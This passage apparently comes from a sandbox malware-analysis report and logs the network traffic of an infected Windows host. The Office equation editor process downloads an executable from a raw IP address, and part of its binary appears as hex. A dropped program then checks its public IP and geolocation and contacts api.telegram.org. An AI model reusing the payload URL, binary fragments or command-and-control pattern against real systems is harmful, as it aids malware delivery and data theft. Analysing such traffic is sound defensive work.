                                                                                          Oct 7, 2024 14:56:08.762989044 CEST8.8.8.8192.168.2.220x603aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.762989044 CEST8.8.8.8192.168.2.220x603aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.762989044 CEST8.8.8.8192.168.2.220x603aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.762989044 CEST8.8.8.8192.168.2.220x603aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.772165060 CEST8.8.8.8192.168.2.220x4ef7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.772165060 CEST8.8.8.8192.168.2.220x4ef7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.772165060 CEST8.8.8.8192.168.2.220x4ef7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.772165060 CEST8.8.8.8192.168.2.220x4ef7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.772165060 CEST8.8.8.8192.168.2.220x4ef7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:08.772165060 CEST8.8.8.8192.168.2.220x4ef7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:09.707715988 CEST8.8.8.8192.168.2.220xb470No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:09.707715988 CEST8.8.8.8192.168.2.220xb470No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.358406067 CEST8.8.8.8192.168.2.220x79e9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.358406067 CEST8.8.8.8192.168.2.220x79e9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.358406067 CEST8.8.8.8192.168.2.220x79e9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.358406067 CEST8.8.8.8192.168.2.220x79e9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.358406067 CEST8.8.8.8192.168.2.220x79e9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.358406067 CEST8.8.8.8192.168.2.220x79e9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.368470907 CEST8.8.8.8192.168.2.220x4b46No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.368470907 CEST8.8.8.8192.168.2.220x4b46No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.368470907 CEST8.8.8.8192.168.2.220x4b46No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.368470907 CEST8.8.8.8192.168.2.220x4b46No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.368470907 CEST8.8.8.8192.168.2.220x4b46No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:10.368470907 CEST8.8.8.8192.168.2.220x4b46No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:11.816670895 CEST8.8.8.8192.168.2.220x736dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:11.816670895 CEST8.8.8.8192.168.2.220x736dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 7, 2024 14:56:12.608266115 CEST8.8.8.8192.168.2.220x101aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • reallyfreegeoip.org
                                                                                          • api.telegram.org
                                                                                          • 154.216.19.160
                                                                                          • checkip.dyndns.org

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.2249163154.216.19.160803372C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:55:51.307735920 CEST324OUTGET /txt/6FfzLi8FyhIIqWu.exe HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                          Host: 154.216.19.160
                                                                                          Connection: Keep-Alive
                                                                                          Oct 7, 2024 14:55:52.107069016 CEST1236INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.24.0
                                                                                          Date: Mon, 07 Oct 2024 12:55:51 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 686080
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Mon, 07 Oct 2024 06:03:47 GMT
                                                                                          ETag: "a7800-623dcc8bb8743"
                                                                                          Accept-Ranges: bytes
                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 39 75 03 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6e 0a 00 00 08 00 00 00 00 00 00 4a 8c 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 8b 0a 00 4f 00 00 00 00 a0 0a 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 fc 75 0a 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL9ug0nJ @ @OuT H.textPl n `.rsrcp@@.relocv@B,H<9.g01~o,s~o+*&(*B(}*{*0(o*Z(.(+*r(-~(o+*0Xs%o%o%o%$o%Ho%o%$os*{*"}*~*0ms}(o+5( (!+((
                                                                                          Oct 7, 2024 14:55:52.107091904 CEST1236INData Raw: 22 00 00 0a 6f 23 00 00 0a 00 00 06 25 17 59 0a 16 fe 02 0d 09 2d df 00 12 01 28 24 00 00 0a 2d c2 de 0f 12 01 fe 16 04 00 00 1b 6f 25 00 00 0a 00 dc 2a 00 00 00 01 10 00 00 02 00 1b 00 42 5d 00 0f 00 00 00 00 9a 02 28 09 00 00 06 28 0b 00 00 06
                                                                                          Data Ascii: "o#%Y-($-o%*B](((o&o'o((*.s)*rp}rp}}(*(*0so*>r!p(*>r=p(*>rYp(
                                                                                          Oct 7, 2024 14:55:52.107103109 CEST1236INData Raw: 11 11 06 19 5e 16 fe 01 13 12 11 12 2c 10 00 11 08 72 19 01 00 70 28 48 00 00 0a 13 08 00 09 11 06 07 11 06 91 11 04 11 11 95 61 28 49 00 00 0a 9c 11 06 17 58 13 06 00 11 06 6e 09 8e 69 6a fe 04 13 13 11 13 3a 6e ff ff ff 02 7b 0b 00 00 04 20 cc
                                                                                          Data Ascii: ^,rp(Ha(IXnij:n{ :s;o<{o={r+po>{o?{s@oA{(Jo2{o3o4{o5{(6o7{ %
                                                                                          Oct 7, 2024 14:55:52.107111931 CEST1236INData Raw: 0b 38 9d 00 00 00 00 72 cd 01 00 70 12 01 28 60 00 00 0a 28 48 00 00 0a 0a 28 61 00 00 0a 06 6f 62 00 00 0a 74 06 00 00 02 0c 08 14 fe 01 0d 09 2c 6c 00 02 06 28 3a 00 00 0a 00 02 28 63 00 00 0a 6f 64 00 00 0a 13 04 12 04 28 65 00 00 0a 02 28 66
                                                                                          Data Ascii: 8rp(`(H(aobt,l(:(cod(e(fYX}(cod(g(hZYZY}{{s8(i+X:U(cod(e(fYY}{o>(j}{
                                                                                          Oct 7, 2024 14:55:52.107122898 CEST1236INData Raw: 0b 07 06 8e 69 32 c0 72 55 02 00 70 28 20 00 00 06 6f 81 00 00 0a 8c 4d 00 00 01 28 82 00 00 0a 28 23 00 00 06 00 38 ac 00 00 00 00 00 28 20 00 00 06 6f 83 00 00 0a 0d 2b 7f 12 03 28 84 00 00 0a 13 04 00 7e 85 00 00 0a 28 23 00 00 06 00 11 04 28
                                                                                          Data Ascii: i2rUp( oM((#8( o+(~(#(&(&(%,no,~oG~oV,o5(%,'(:uo%8L*%
                                                                                          Oct 7, 2024 14:55:52.107131004 CEST1236INData Raw: 6f 3f 00 00 06 18 28 2a 00 00 06 00 00 2b 1e 00 02 03 6f 3f 00 00 06 17 28 2a 00 00 06 00 02 04 6f 3f 00 00 06 17 28 2a 00 00 06 00 00 2a 13 30 04 00 54 00 00 00 00 00 00 00 00 02 03 28 2b 00 00 06 00 02 03 6f 43 00 00 06 6f 3f 00 00 06 02 03 6f
                                                                                          Data Ascii: o?(*+o?(*o?(**0T(+oCo?oC(3oDY()oEo?oE(3oFX()*zs}s}(*09~,"rp(,os~+*
                                                                                          Oct 7, 2024 14:55:52.107141972 CEST1236INData Raw: 00 00 01 00 00 00 0a 00 00 00 1d 00 00 00 24 00 00 00 0b 00 00 00 01 00 00 00 04 00 00 00 03 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 00 00 d2 05 01 00 00 00 00 00 06 00 fb 04 48 0b 06 00 7c 05 48 0b 06 00 fb 03 ff 0a 0f 00 e1 0b 00 00 06 00
                                                                                          Data Ascii: $H|HWc4nC))E]GN5ovhi
                                                                                          Oct 7, 2024 14:55:52.107151985 CEST1236INData Raw: b3 03 56 80 e3 0e b3 03 56 80 26 03 b3 03 06 06 b8 00 b7 03 56 80 63 0d f4 03 56 80 5f 06 f4 03 56 80 b9 0a f4 03 56 80 b4 09 f4 03 50 20 00 00 00 00 96 00 59 07 f8 03 01 00 8d 20 00 00 00 00 81 18 e3 0a 06 00 02 00 97 20 00 00 00 00 81 18 e3 0a
                                                                                          Data Ascii: VV&VcV_VVP Y U U + v!l!t!}!M!""I-7"C"
                                                                                          Oct 7, 2024 14:55:52.107161999 CEST1224INData Raw: 00 00 00 00 86 00 3a 03 f8 04 45 00 b8 32 00 00 00 00 86 18 e3 0a 06 00 46 00 00 00 00 00 03 00 86 18 e3 0a 2e 01 46 00 00 00 00 00 03 00 c6 01 2a 02 10 00 48 00 00 00 00 00 03 00 c6 01 25 02 fe 04 49 00 00 00 00 00 03 00 c6 01 1b 02 09 05 4c 00
                                                                                          Data Ascii: :E2F.F*H%ILii p p
                                                                                          Oct 7, 2024 14:55:52.107172012 CEST1128INData Raw: e3 0d 06 00 f1 00 d6 01 e8 01 f1 00 5b 0f 01 00 f1 00 cb 09 15 00 f9 00 e4 06 34 01 a1 02 c1 0d 00 01 b1 00 73 02 ef 01 91 02 db 0d 06 00 71 02 24 0c f6 01 71 02 06 0e fa 01 71 02 84 09 ff 01 b1 02 b6 02 0e 02 b9 02 0b 02 1a 02 b1 02 cb 05 0e 02
                                                                                          Data Ascii: [4sq$qq<DD<<k_<eLPwzL/iIPI/<H?\
                                                                                          Oct 7, 2024 14:55:52.107182026 CEST1128INData Raw: e3 0d 06 00 f1 00 d6 01 e8 01 f1 00 5b 0f 01 00 f1 00 cb 09 15 00 f9 00 e4 06 34 01 a1 02 c1 0d 00 01 b1 00 73 02 ef 01 91 02 db 0d 06 00 71 02 24 0c f6 01 71 02 06 0e fa 01 71 02 84 09 ff 01 b1 02 b6 02 0e 02 b9 02 0b 02 1a 02 b1 02 cb 05 0e 02
                                                                                          Data Ascii: [4sq$qq<DD<<k_<eLPwzL/iIPI/<H?\


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.2249164158.101.44.242803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:55:57.021374941 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 7, 2024 14:55:57.609806061 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:55:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 5e5856c31ff673a5da06b6e07e4527a7
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                          Oct 7, 2024 14:55:57.824419975 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:55:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 5e5856c31ff673a5da06b6e07e4527a7
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                          Oct 7, 2024 14:55:57.847131968 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 7, 2024 14:55:57.994910002 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:55:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 09153a04db381fdfe0c28a7808343976
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                          Oct 7, 2024 14:55:58.208569050 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:55:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 09153a04db381fdfe0c28a7808343976
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                          Oct 7, 2024 14:55:58.844568014 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 7, 2024 14:55:58.992213011 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:55:58 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 47d93b1f051a9e24407f4e8e753d8eb8
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.2249167158.101.44.242803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:56:01.352619886 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 7, 2024 14:56:01.890409946 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 1545704d5c131c5602eb485f030c2a77
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                          Oct 7, 2024 14:56:02.158997059 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 1545704d5c131c5602eb485f030c2a77
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.2249169158.101.44.242803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:56:02.572370052 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 7, 2024 14:56:03.108062029 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:03 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 4d5e75bb0834f167c6705c757e668a3c
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.2249171193.122.6.168803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:56:03.791893005 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 7, 2024 14:56:04.386260986 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:04 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: a5be6906165804ad7be6a8cc90a9539f
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.2249173193.122.130.0803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:56:05.066622972 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 7, 2024 14:56:05.532824039 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:05 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 0e67c145fa6e1f25243021b371700355
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                          Oct 7, 2024 14:56:05.748428106 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:05 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 0e67c145fa6e1f25243021b371700355
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.2249175132.226.8.169803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:56:06.183052063 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 7, 2024 14:56:07.960624933 CEST272INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.2249177193.122.130.0803628C:\Users\user\AppData\Roaming\obisfd.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 7, 2024 14:56:08.777663946 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 7, 2024 14:56:09.694041967 CEST320INHTTP/1.1 200 OK
                                                                                          Date: Mon, 07 Oct 2024 12:56:09 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 103
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: c6ded7ea43a0523002a71909c23ec8c3
